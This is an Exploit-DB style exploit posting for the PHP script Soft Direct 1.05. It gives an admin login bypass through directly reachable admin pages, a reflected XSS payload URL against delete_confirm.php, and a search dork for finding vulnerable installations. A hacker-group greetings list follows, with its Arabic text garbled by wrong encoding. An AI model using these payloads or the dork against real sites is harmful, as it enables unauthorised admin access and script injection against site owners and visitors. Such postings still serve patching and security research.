Soft Direct 1.05 - Multiple Vulnerabilities

EDB-ID:

11189

CVE:

N/A
Platform:

PHP

Date:

2010-01-18


========================================================================================         
| # Title    : Soft Direct v1.05 Multti Vulnerability   
| # Author    : indoushka                                
| # email    : indoushka@hotmail.com                          
| # Home     : www.iq-ty.com/vb                                       
| # Script Home : http://hotfile.com/dl/23890178/c3b1ee3/SoftDirect.v1.05.rar.html                                                              
| # Dork     : [ Software Directory Powered by SoftDirec 1.05 ]                   
| # Tested on  : windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)    
| # Bug     : Mullti                                  
======================   Exploit By indoushka    =================================
# Exploit : 
 
 1- By Pass Login
 
 http://127.0.0.1/softdirec/admin/home.php
 
 http://127.0.0.1/softdirec/admin/settings.php
 
 2- XSS
 
http://127.0.0.1/softdirec/library/delete_confirm.php?delete=yes&id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&return=souk%20naamane&type=hacked%20by&catdel=indoushka
 
================================  Dz-Ghost Team  ========================================================
Greetz : ÔßÑÇ áÓßÇä æáÇíÉ ÓíÏí ÈáÚÈÇÓ 22 + äÇÓ ãÚÓßÑ + äÇÓ ÊíÇÑÊ + äÇÓ ÇáÌáÝÉ + äÇÓ ÇáãÓíáÉ
+ äÇÓ ÊáãÓÇä + äÇÓ äÏÑæãÉ +äÇÓ ãÛäíÉ + äÇÓ æÌÏÉ +äÇÓ ÃÛÇÏíÑ + äÇÓ ÝÇÓ æãßäÇÓ + äÇÓ æåÑÇä
Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.forums.ibb7.com * www.owned-m.com *Stake (v4-team.com) * www.dev-chat.com * Cyb3r IntRue (avengers team) 
* www.securityreason.com * www.packetstormsecurity.org * www.best-sec.net * www.zone-h.net * www.m-y.cc 
* www.hacker.ps * no-exploit.com * www.bug-blog.de * www.bawassil.com * www.host4ll.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) * www.kadmiwe.net
SoldierOfAllah (www.m4r0c-s3curity.cc) * www.arhack.net * www.google.com * www.sec-eviles.com  
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.arabic-m.com * www.securitywall.org 
r1z (www.sec-r1z.com) * www.zac003.persiangig.ir * www.0xblackhat.ir * www.mormoroth.net 
------------------------------------------------------------------------------------------------------------